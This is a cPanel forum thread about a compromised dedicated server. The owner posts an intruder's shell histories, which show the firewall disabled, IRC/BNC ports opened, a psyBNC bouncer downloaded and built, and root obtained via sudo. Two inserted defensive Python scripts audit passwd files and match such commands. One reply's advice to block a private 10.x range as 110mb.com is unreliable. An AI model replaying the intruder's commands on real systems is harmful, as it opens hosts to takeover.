Two hackcheck notice emails

reficul

Member
Dec 15, 2008
20
0
51
Italy
cPanel Access Level
Root Administrator
[hackcheck] mysqli has a uid 0 account
[hackcheck] services has a uid 0 account

The history command reports this activity:

Code:
cat /etc/ssh/sshd_config
exit
whereis gcc
chmod +x /usr/bin/gcc
exit
service iptables status
service iptables stop
whereis iptables
whereis irc
iptables -L -v
iptables -L
service iptables start
iptables -A INPUT -p tcp --dport 6667 -j ACCEPT
iptables -A INPUT -p tcp --dport 1234 -j ACCEPT
iptables-save
service iptables start
iptables -A INPUT -p tcp --dport 2345 -j ACCEPT
iptables-save
iptables -A INPUT -p tcp --dport 2345 -j ACCEPT
service iptables save
iptables -A INPUT -p tcp --dport 31337 -j ACCEPT
service iptables save
iptables-save
exit
service iptables stop
exit
service oidentd start
cat ssstt
cd com
service iptables stop
whereis oidentd
/usr/sbin/oidentd start
service oidentd start
ps -e
kill -9 29521
ps -e
service iptables stop
service iptables stop
exit
What should I do?
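A check equivalent to the hackcheck warning above, written as an added example (it is not cPanel's hackcheck code and not from this thread): it parses a copy of /etc/passwd, lists uid 0 accounts other than root, finds UIDs shared by several names, and diffs the file against a known-good passwd restored from backup. The baseline system accounts are assumed; the three suspicious entries are the ones reficul quotes further down in the thread.

```python
"""Audit an /etc/passwd snapshot for the condition cPanel's hackcheck flagged
above (a uid 0 account other than root) and diff it against a known-good copy.

Added example; not part of the original thread and not hackcheck's own code.
Operates on passwd text passed in, so it can be run offline on a copy pulled
from the box and a baseline restored from backup. The sample passwd content
at the bottom is constructed: the baseline system accounts are assumed, the
three extra lines are the ones quoted in the thread.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class PasswdEntry:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd(5) text into entries. A malformed line is itself a
    finding, so it raises rather than being skipped silently."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"passwd line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), gecos, home, shell))
    return entries


def uid0_accounts(entries):
    """The hackcheck condition: any account with uid 0 that is not root."""
    return [e.name for e in entries if e.uid == 0 and e.name != "root"]


def duplicate_uids(entries):
    """Any UID shared by more than one name. uid 0 is the dangerous case, but
    a service UID reused for a backdoor account is the same trick."""
    by_uid = defaultdict(list)
    for e in entries:
        by_uid[e.uid].append(e.name)
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}


def diff_against_baseline(current, baseline):
    """Accounts added since the baseline, and existing accounts whose
    uid/gid/home/shell changed (e.g. a nologin account given /bin/bash)."""
    base = {e.name: e for e in baseline}
    added = [e.name for e in current if e.name not in base]
    changed = [e.name for e in current if e.name in base and base[e.name] != e]
    return added, changed


def audit(current_text, baseline_text):
    """Run every check and return the findings keyed by check name."""
    current = parse_passwd(current_text)
    baseline = parse_passwd(baseline_text)
    added, changed = diff_against_baseline(current, baseline)
    return {
        "uid0": uid0_accounts(current),
        "duplicate_uids": duplicate_uids(current),
        "added": added,
        "changed": changed,
    }


# Constructed sample: an assumed minimal baseline, plus the three lines
# reficul quoted from the compromised box.
BASELINE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
nobody:x:99:99:Nobody:/:/sbin/nologin
"""

COMPROMISED_PASSWD = BASELINE_PASSWD + """\
services:x:0:0::/home/services:/bin/bash
mysqli:x:0:0::/home/mysqli:/bin/bash
sgl:x:32008:32010::/home/sgl:/bin/bash
"""

if __name__ == "__main__":
    for key, value in audit(COMPROMISED_PASSWD, BASELINE_PASSWD).items():
        print(f"{key}: {value}")
```

Run it against a copy of /etc/passwd taken off the box and a passwd from a backup that predates the first notice. Because the lines came back at 2:59am after being removed, whatever re-adds them (a cron entry or a running process) is still there, so the check is worth scheduling until the box is rebuilt. It says nothing about /etc/shadow, sudoers or authorized_keys, which need the same diff against the baseline.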
 

theitjerk

Member
Apr 19, 2012
14
0
51
Los Angeles
cPanel Access Level
Reseller Owner
Is this a VPS or server you're running? If it's a webserver, could be a script or configuration error. But if it's a VPS, I'd assume you may have been breached :-/ Do you have root access over the server?
 

reficul
It's a dedicated server. After I removed the two lines from passwd, yesterday at 2:59am the two lines

services:x:0:0::/home/services:/bin/bash
mysqli:x:0:0::/home/mysqli:/bin/bash

were added to the /etc/passwd file again.

I also found:

sgl:x:32008:32010::/home/sgl:/bin/bash

and some strange files in /home/sgl, like:
psybiru.tar.gz
 

theitjerk
Ouch. You have been breached. Getting any random calls from this domain?

-removed- EDIT - Lol, that showed up with the URL - didn't know it would automatically throw that. It translates to http[colon]3xploit.110mb.com

psybiru.tar.gz is an IP shell; it lets you use IRC through it, aka a BNC server. Disaster recovery time...

These are all just my suggestions, I'm kinda new here, and I don't want to overstep, but this is what I do :)

1. Back up your web data locally immediately.
2. Change all of your passwords - FTP, web, mail, etc. In fact, kill FTP altogether if you can, to be safe.
3. Make sure any non-cPanel scripts are updated; if you can, terminate them too.
4. Go to your raw IP logs and turn on archiving. Maybe you can figure out where the POE was if you check the detailed records. Guaranteed you have a secondary user set up somewhere with vulnerable permissions.
5. BLOCK anything from 110mb.com. It is a 100% temporary solution, but it will stop the automatic reinstall of the shell in question for a little while, giving you time to examine the logs.

Are you running WebDAV? Again, if you can turn it off, do so. The WebDAV exploit isn't new, but it's been popping up again on the underground forums... weird how old stuff can come back to bite ya, huh? Oh yeah, block anything related to IRC and BNC if you have no dependencies. This will all just buy you time, but that's exactly the thing your pesky intruders are looking for too.

If you can figure out whether you have any IRC/BNC connections and what the source IPs are, I would be happy to do a little research on those myself. Nothin' like a little honeypot action to start my morning off...
 

theitjerk
Reported to 110mb.com. They take care of this stuff pretty quick, but take care of your situation ASAP! Feel free to let me know if you need help, I'll be around for a couple more hours if you need anything (applies to anyone else having an issue with this). Just checked, this domain has been around for a bit... weird.
 

theitjerk
Glad to see your head is in the right place. Remember, your backups will likely be infected to some degree as well. Don't just pop them right back up without some proper analysis.
 

theitjerk
You can either block the FQDN (fully qualified domain name) or a single IP, or a range. In this case, I would block a range (10.12.12.1-10.12.13.1), since 110mb is a shared host, and a popular one at that. Use the IP Deny Manager in cPanel.
 

reficul
.bash_history of the fake user:

Code:
id
sudo -i
hostname
w
logout
cat /etc/ssh/sshd_config
sudo -i
id
w
wget -removed url-
tar -zxvf psyBNC-2.3.2-7.tar.gz
cd psybnc
make menuconfig
sudo -i
make menuconfig
whereis ld
make menuconfig
make
ls -al
pwd
pico psybncchk
./psybnc
kill -9 24536
ps -c
ls -al
cat psybnc.conf
pico psybnc.conf
./psybnc
ps -c
./psybnc
ps -c
cd
ls -al
wget -removed url-  -zxvf psybiru.tar.gz
cd components/
./config 1234;./****************;./run
cd scripts
rm -rf DEFAULT.SCRIPT
wget -removed url-
cd
logout
sudo
sudo -i
ls -al
ps -c
ps -x
killall -9 psybnc
cd psybnc
./psybnc
cat psybnc.conf
ps -c
pwd
killall -9 psybnc
pico psybnc.conf
./psybnc
pico psybnc.conf
killall -9 psybnc
pico psybnc.conf
./psybnc
sudo -i
cd
killall -9 psybnc
ls -al
cd components
ls -al
pico psybnc.conf
pico ssstt
rm -rf ssstt
ps -x
killall -9 psybnc
killall -9 psybnc
 
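The two histories posted in this thread (root's in the first post, sgl's just above) show the same handful of indicators: a root shell taken from an unprivileged account, the firewall stopped or opened for IRC/BNC ports, a bouncer fetched and built, processes killed by PID. The scanner below is an added example, not code from the thread, that tags those indicators in history text and extracts the ports that were opened; the port allowlist is an assumption about what this box should be serving, and the sample history lines are constructed from the two dumps (with one rule for an allowed port added to show the allowlist working).

```python
"""Scan shell history text for the indicators visible in the two histories
posted in this thread: root shell from an unprivileged account, firewall
stopped or opened for IRC/BNC ports, a bouncer fetched and built, processes
killed by PID.

Added example; it is not from the original thread. The history lines at the
bottom are constructed from the two dumps above, and the port allowlist is an
assumption about what this particular host should be accepting.
"""
import re

ALLOWED_INPUT_PORTS = {22, 80, 443}  # assumption: services this host should expose

# An INPUT ACCEPT rule for a single port; the port number is group 1.
ACCEPT_RULE = re.compile(r"^\s*iptables\s+-A\s+INPUT\b.*--dport\s+(\d+)\b.*-j\s+ACCEPT\b")

# (tag, pattern) pairs; a line gets the first tag whose pattern matches.
RULES = [
    ("root-shell", re.compile(r"^\s*(sudo\s+-[is]\b|sudo\s+su\b|su\s+-?\s*$|su\s+root\b)")),
    ("firewall-stopped", re.compile(r"^\s*(service\s+iptables\s+stop|/etc/init\.d/iptables\s+stop|iptables\s+-F)\b")),
    ("remote-fetch", re.compile(r"^\s*(wget|curl|fetch|ftp)\b")),
    ("compiler", re.compile(r"\bgcc\b|^\s*make\b")),
    ("process-kill", re.compile(r"^\s*kill\s+-9\s+\d+|^\s*killall\s+-9\b")),
    ("ident-daemon", re.compile(r"\boidentd\b")),
    ("bouncer", re.compile(r"psybnc|psybiru|\bbnc\b", re.IGNORECASE)),
]


def scan_history(lines, allowed_ports=ALLOWED_INPUT_PORTS):
    """Return (line_number, tag, command) for each line matching an indicator.
    Firewall openings are checked first, so an ACCEPT for an allowed port
    produces no finding while one for 6667 or 31337 does."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = ACCEPT_RULE.match(line)
        if m:
            if int(m.group(1)) not in allowed_ports:
                findings.append((n, "opened-port", line.strip()))
            continue
        for tag, rx in RULES:
            if rx.search(line):
                findings.append((n, tag, line.strip()))
                break
    return findings


def opened_ports(lines, allowed_ports=ALLOWED_INPUT_PORTS):
    """Sorted ports the history opened in INPUT that are not on the allowlist."""
    ports = set()
    for line in lines:
        m = ACCEPT_RULE.match(line)
        if m and int(m.group(1)) not in allowed_ports:
            ports.add(int(m.group(1)))
    return sorted(ports)


def summarize(lines):
    """Tag -> count, for a first look at a long history."""
    counts = {}
    for _, tag, _ in scan_history(lines):
        counts[tag] = counts.get(tag, 0) + 1
    return counts


# Constructed from root's history in the first post, plus one allowed-port rule.
ROOT_HISTORY = """\
cat /etc/ssh/sshd_config
whereis gcc
chmod +x /usr/bin/gcc
service iptables stop
iptables -A INPUT -p tcp --dport 6667 -j ACCEPT
iptables -A INPUT -p tcp --dport 1234 -j ACCEPT
iptables -A INPUT -p tcp --dport 2345 -j ACCEPT
iptables -A INPUT -p tcp --dport 31337 -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
service iptables save
service oidentd start
kill -9 29521
""".splitlines()

# Constructed from sgl's .bash_history above; the URL was removed on the forum.
SGL_HISTORY = """\
id
sudo -i
w
wget -removed url-
tar -zxvf psyBNC-2.3.2-7.tar.gz
cd psybnc
make
./psybnc
killall -9 psybnc
ls -al
""".splitlines()

if __name__ == "__main__":
    for name, hist in (("root", ROOT_HISTORY), ("sgl", SGL_HISTORY)):
        print(f"== {name}: opened ports {opened_ports(hist)}")
        for n, tag, cmd in scan_history(hist):
            print(f"{n:>3} {tag:<17} {cmd}")
```

Two caveats when using it. Histories are written by the intruder's own shell, so they can be edited or disabled; what survives is what they did not bother to clean, and an empty result is not evidence of absence. The "root-shell" hits from sgl are the ones to chase in /var/log/secure (or auth.log), where sudo records who ran it and from where, which is what the history alone cannot tell you.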

cPanelTristan

Quality Assurance Analyst
Staff member
Oct 2, 2010
7,607
43
348
somewhere over the rainbow
cPanel Access Level
Root Administrator
Do you mean it is WordPress? Exim cannot execute commands that would cause this type of issue.